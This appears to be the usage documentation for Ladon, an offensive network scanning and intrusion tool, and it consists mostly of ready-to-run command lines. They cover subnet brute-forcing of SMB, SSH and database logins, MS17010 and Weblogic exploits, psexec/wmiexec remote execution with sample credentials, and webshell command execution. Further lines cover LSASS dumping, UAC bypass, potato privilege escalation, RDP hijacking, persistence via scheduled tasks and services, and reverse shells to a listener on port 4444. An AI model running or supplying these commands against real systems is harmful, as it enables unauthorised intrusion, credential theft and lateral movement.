9.0 plugin download: https://mp.weixin.qq.com/s/GQBXCX1fiSLi6gKY3M-JcA
Ladon is a multi-threaded, plugin-based comprehensive scanning tool for large-network penetration testing. It covers port scanning, service identification, network asset discovery, password brute-forcing, high-risk vulnerability detection and one-click GetShell; it supports batch scanning of A/B/C-class ranges as well as cross-subnet scanning, and can scan from URL, host and domain lists. Version 7.2 has 94 built-in function modules and 18 external modules. Through multiple protocols and methods it quickly collects information about the target network: live host IPs, computer names, workgroups, shared resources, NIC addresses, OS versions, websites, subdomains, middleware, open services, routers, databases and more. Vulnerability detection includes MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, the Struts2 series and others. Password brute-forcing covers 13 types, including databases (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic and Rar. Remote command execution includes wmiexe/psexec/atexec/sshexec/jspshell. The web fingerprinting module recognises 75 kinds (web applications, middleware, script types, page types). Plugin POCs are highly customisable and can be written as .NET assemblies, DLLs (C#/Delphi/VC), PowerShell and other languages; any external program or command can be batch-invoked via an INI configuration, and the EXP generator produces a vulnerability POC with one click to quickly extend scanning capability. Ladon also supports plugin-based scanning from Cobalt Strike to quickly expand into the internal network for lateral movement.
ID | Topic | URL |
---|---|---|
0 | Full Ladon documentation | https://k8gege.org/Ladon |
New Version: https://k8gege.org/Download
All Version: https://github.com/k8gege/Ladon/releases/
This article only gives simple usage examples for Ladon; usage of the Cobalt Strike, PowerShell, KaliLadon and cross-platform versions is identical.
Example: scan the 10.1.2.x range for the MS17010 vulnerability (noping must be added): Ladon noping 10.1.2.8/24 MS17010
See: http://k8gege.org/Ladon/proxy.html
Ladon 192.168.1.8/24 OnlinePC
Ladon 192.168.1.8/24 OsScan
Ladon 192.168.1.8/24 OnlineIP
Ladon 192.168.1.8/24 Ping
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WebScan
Ladon 192.168.1.8/24 UrlScan
Ladon 192.168.1.8/24 SameWeb
Ladon baidu.com SubDomain
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 WhatCMS
Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan
Ladon EnumMssql
Ladon EnumShare
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 FtpScan
For password brute-force details, see the SSH reference: http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 WinrmScan.ini
Ladon 192.168.1.8/24 SmbHashScan
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan
Ladon 192.168.1.8/24 WeblogicScan
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan
Ladon 192.168.1.8/24 SmbScan.ini
Ladon 192.168.1.8/24 IpcScan.ini
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 WeblogicPoc
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
Ladon 192.168.1.8/24 Struts2Poc
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
Ladon 123456 EnHex
Ladon 313233343536 DeHex
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
Ladon FtpSniffer 192.168.1.5
Ladon HTTPSniffer 192.168.1.5
Ladon Sniffer
Ladon IISpwd
Ladon DumpLsass
Ladon EnumProcess
Ladon Tasklist
Ladon cmdline
Ladon cmdline cmd.exe
Ladon GetInfo
Ladon GetInfo2
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
Ladon Ver
Ladon Version
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
Usage: Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Usage: Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Ladon BypassUac c:\1.exe
Ladon BypassUac c:\1.bat
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
Ladon Runas user pass cmd
Ladon EnableDotNet
Ladon gethtml http://192.168.1.1
Ladon CheckDoor
Ladon AutoRun
Ladon GetIP
Ladon WebSer 80
Ladon web 80
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon RDPHijack 3
Ladon RDPHijack 3 console
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
Ladon Recent
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe
Ladon at c:\123.exe gui
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
Ladon ms16135 whoami
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
Ladon whoami
Ladon Open3389
Ladon RdpLog
Ladon QueryAdmin
Ladon ActiveAdmin
Ladon ActiveGuest
Ladon GetPipe
Ladon 192.168.1.8/24 NbtScan